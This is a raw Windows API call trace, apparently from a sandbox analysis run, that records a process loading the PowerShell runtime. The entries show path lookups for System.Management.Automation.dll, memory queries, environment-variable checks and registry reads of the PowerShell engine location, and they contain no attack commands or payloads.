	[0344.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.216] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0344.479] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.479] CoTaskMemFree (pv=0x100100) 
	[0344.484] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0344.492] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.492] CoTaskMemFree (pv=0x100100) 
	[0344.493] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.493] CoTaskMemFree (pv=0x100100) 
	[0344.493] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.494] CoTaskMemFree (pv=0x100100) 
	[0344.495] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.495] CoTaskMemFree (pv=0x100100) 
	[0344.500] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.500] CoTaskMemFree (pv=0x100100) 
	[0344.501] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.501] CoTaskMemFree (pv=0x100100) 
	[0344.509] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0344.509] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.159] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.162] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0345.162] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.162] CoTaskMemFree (pv=0x100100) 
	[0345.426] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x100210
	[0345.426] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x100320
	[0346.062] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.351] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.354] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.354] VirtualQuery (in: lpAddress=0x26a080, lpBuffer=0x26af40, dwLength=0x30 | out: lpBuffer=0x26af40*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.381] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.381] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.381] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.381] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.381] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.381] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.381] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.381] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.381] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.382] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.382] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.382] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.382] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.382] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.382] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.382] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.382] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.382] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.382] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.382] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.383] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.383] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.383] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.383] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.383] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.383] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.383] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.383] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.383] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.384] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0346.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.384] CoTaskMemFree (pv=0x100430) 
	[0346.729] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0346.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.729] CoTaskMemFree (pv=0x100430) 
	[0346.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.775] VirtualQuery (in: lpAddress=0x26b8e0, lpBuffer=0x26c7a0, dwLength=0x30 | out: lpBuffer=0x26c7a0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.121] VirtualQuery (in: lpAddress=0x26b8e0, lpBuffer=0x26c7a0, dwLength=0x30 | out: lpBuffer=0x26c7a0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.122] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.122] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.122] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d738 | out: phkResult=0x26d738*=0x340) returned 0x0
	[0347.122] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d6bc, lpData=0x0, lpcbData=0x26d6b8*=0x0 | out: lpType=0x26d6bc*=0x1, lpData=0x0, lpcbData=0x26d6b8*=0x56) returned 0x0
	[0347.122] CoTaskMemAlloc (cb=0x5a) returned 0x1b923bd0
	[0347.122] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d68c, lpData=0x1b923bd0, lpcbData=0x26d688*=0x56 | out: lpType=0x26d68c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d688*=0x56) returned 0x0
	[0347.122] CoTaskMemFree (pv=0x1b923bd0) 
	[0347.123] RegCloseKey (hKey=0x340) returned 0x0
	[0347.123] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d738 | out: phkResult=0x26d738*=0x340) returned 0x0
	[0347.123] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d6bc, lpData=0x0, lpcbData=0x26d6b8*=0x0 | out: lpType=0x26d6bc*=0x1, lpData=0x0, lpcbData=0x26d6b8*=0x56) returned 0x0
	[0347.123] CoTaskMemAlloc (cb=0x5a) returned 0x1b923bd0
	[0347.123] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d68c, lpData=0x1b923bd0, lpcbData=0x26d688*=0x56 | out: lpType=0x26d68c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d688*=0x56) returned 0x0
	[0347.123] CoTaskMemFree (pv=0x1b923bd0) 
	[0347.123] RegCloseKey (hKey=0x340) returned 0x0
	[0347.123] CoTaskMemAlloc (cb=0x20c) returned 0x1b8ef970
	[0347.123] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8ef970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0347.123] CoTaskMemFree (pv=0x1b8ef970) 
	[0347.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0347.124] CoTaskMemAlloc (cb=0x20c) returned 0x1b8ef970
	[0347.124] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8ef970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0347.124] CoTaskMemFree (pv=0x1b8ef970) 
